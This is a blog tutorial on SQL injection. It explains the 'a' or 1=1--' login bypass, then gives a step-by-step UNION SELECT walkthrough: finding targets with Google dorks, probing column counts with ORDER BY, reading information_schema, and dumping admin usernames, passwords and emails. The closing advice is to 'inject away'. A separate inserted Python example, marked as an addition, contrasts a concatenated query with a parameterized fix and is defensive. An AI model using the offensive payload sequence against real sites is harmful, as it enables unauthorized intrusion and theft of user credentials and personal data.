Introduction
SQL injection is by far the most common, useful, versatile, and simple attack to carry out against a vulnerable web server.
An SQL injection exploits the developer's errors instead of exploiting a server or service installed on the host machine. SQL injection vulnerabilities are caused when the information a user provides is not checked before being sent to the database.
Example:
SQL syntax: SELECT * FROM users WHERE username='&username';
If you send the text myname, the query becomes: SELECT * FROM users WHERE username='myname';
The problem arises when we pass more SQL instead of a username, such as a' or 1=1--. In this case the SQL query becomes: SELECT * FROM users WHERE username='a' or 1=1--'
The -- starts an SQL comment, so the rest of the line (including the original closing quote) is ignored. Because 1=1 is always true, every row of the users table is selected, which makes it possible to harvest information from the table such as emails, names, passwords, or sometimes even credit card numbers.
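The string-building mistake described above, beside its fix, as an added example that is not part of the original post: a Python/sqlite3 script with a constructed three-row users table that runs the post's a' or 1=1-- input through a concatenated query and through a parameterized one, so the difference in what each returns can be checked directly.

```python
import sqlite3

# Constructed sample data for the demo (not from the original post).
SAMPLE_USERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("carol", "carol@example.com"),
]


def make_db():
    """Build an in-memory users table with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, username):
    """The pattern from the post: the user-supplied value is pasted into the
    query text, so quotes and comment markers become part of the SQL."""
    query = f"SELECT username, email FROM users WHERE username='{username}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, username):
    """The fix: the value is bound as data, the SQL text never changes, and the
    same input is compared literally against the username column."""
    query = "SELECT username, email FROM users WHERE username=?"
    return conn.execute(query, (username,)).fetchall()


def demo(username):
    """Run one input through both lookups and return the rows each produced."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, username),
        "parameterized": lookup_parameterized(conn, username),
    }


if __name__ == "__main__":
    for name in ("alice", "a' or 1=1--"):
        print(repr(name), demo(name))
```

With the normal input both lookups return the one matching row; with the injected input the concatenated query returns all three rows, while the parameterized query returns nothing because no user is literally named a' or 1=1--.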
Getting Started
In this tutorial we will cover exploiting a URL with an SQL injection. After you find a host using a Google dork, or if you already have a target in mind, you can see whether it is vulnerable by trying a simple injection and looking for an error.
http://site.com/index.php?id=5 ORDER BY 1--
The text after id=5 (ORDER BY 1--) is what was added to make the SQL injection. If you get some sort of SQL error in the web page, or if some content disappears, the page is vulnerable to being attacked.
Now we need to find out how many columns the table has. To do this we keep increasing the number in ORDER BY until we get an error. If we get an error on ORDER BY 7--, we know there is no 7th column.
http://site.com/index.php?id=5 ORDER BY 1-- [No Error!]
http://site.com/index.php?id=5 ORDER BY 2-- [No Error!]
http://site.com/index.php?id=5 ORDER BY 3-- [No Error!]
http://site.com/index.php?id=5 ORDER BY 4-- [No Error!]
http://site.com/index.php?id=5 ORDER BY 5-- [No Error!]
http://site.com/index.php?id=5 ORDER BY 6-- [No Error!]
http://site.com/index.php?id=5 ORDER BY 7-- [Browser displayed error]
We know there are 6 columns, so let's use a command called UNION SELECT to find the vulnerable columns.
http://site.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6--
Look on the page for misplaced numbers. If you are having trouble finding the numbers, try changing the id (or whatever the GET variable is) to -1. Ids are rarely negative, so this clears the page's normal content and leaves only our injected data.
The numbers you see are the vulnerable columns. We are going to use those column positions to gather information about the server and get information out of the tables. For this example we assume that the second column is vulnerable.
Get database Version
http://site.com/index.php?id=5 UNION SELECT 1,version(),3,4,5,6--
Get Table Names
http://site.com/index.php?id=5 UNION SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables--
Get Column Names
http://site.com/index.php?id=5 UNION SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name='admin'--
Extract Data
http://site.com/index.php?id=5 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4,5,6 from admin--
So by extracting the table and column names you can build a query to pull any information from any table. You now know the entire database structure, so just pick and choose what you want and inject away.
Thank you for reading this article about SQL injection. If you want to reproduce this article, please include the link https://pirateddevil.blogspot.com/2013/11/sql-injection.html. Thank you for your attention.